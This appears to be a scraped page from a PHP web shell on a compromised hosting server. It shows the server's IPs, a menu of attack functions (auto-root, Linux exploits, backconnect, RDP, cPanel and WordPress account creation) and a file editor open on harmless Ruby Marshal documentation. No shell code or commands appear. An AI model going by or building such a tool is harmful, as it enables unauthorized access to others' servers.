Linux server220.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
: 198.54.116.164 | : 216.73.216.179
Cant Read [ /etc/named.conf ]
7.4.33
adnangch
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby18 /
share /
ri /
1.8 /
system /
Marshal /
[ HOME SHELL ]
Name
Size
Permission
Action
cdesc-Marshal.yaml
2.23
KB
-rw-r--r--
dump-c.yaml
960
B
-rw-r--r--
load-c.yaml
550
B
-rw-r--r--
restore-c.yaml
556
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cdesc-Marshal.yaml
--- !ruby/object:RI::ClassDescription attributes: [] class_methods: - !ruby/object:RI::MethodSummary name: dump - !ruby/object:RI::MethodSummary name: load - !ruby/object:RI::MethodSummary name: restore comment: - !ruby/struct:SM::Flow::P body: The marshaling library converts collections of Ruby objects into a byte stream, allowing them to be stored outside the currently active script. This data may subsequently be read and the original objects reconstituted. Marshaled data has major and minor version numbers stored along with the object information. In normal use, marshaling can only load data written with the same major version number and an equal or lower minor version number. If Ruby's ``verbose'' flag is set (normally using -d, -v, -w, or --verbose) the major and minor numbers must match exactly. Marshal versioning is independent of Ruby's version numbers. You can extract the version by reading the first two bytes of marshaled data. - !ruby/struct:SM::Flow::VERB body: " str = Marshal.dump("thing")\n RUBY_VERSION #=> "1.8.0"\n str[0] #=> 4\n str[1] #=> 8\n" - !ruby/struct:SM::Flow::P body: "Some objects cannot be dumped: if the objects to be dumped include bindings, procedure or method objects, instances of class IO, or singleton objects, a TypeError will be raised. If your class has special serialization needs (for example, if you want to serialize in some specific format), or if it contains objects that would otherwise not be serializable, you can implement your own serialization strategy by defining two methods, _dump and _load: The instance method _dump should return a String object containing all the information necessary to reconstitute objects of this class and all referenced objects up to a maximum depth given as an integer parameter (a value of -1 implies that you should disable depth checking). The class method _load should take a String and return an object of this class." constants: - !ruby/object:RI::Constant comment: name: MAJOR_VERSION value: INT2FIX(MARSHAL_MAJOR) - !ruby/object:RI::Constant comment: name: MINOR_VERSION value: INT2FIX(MARSHAL_MINOR) full_name: Marshal includes: [] instance_methods: [] name: Marshal superclass:
Close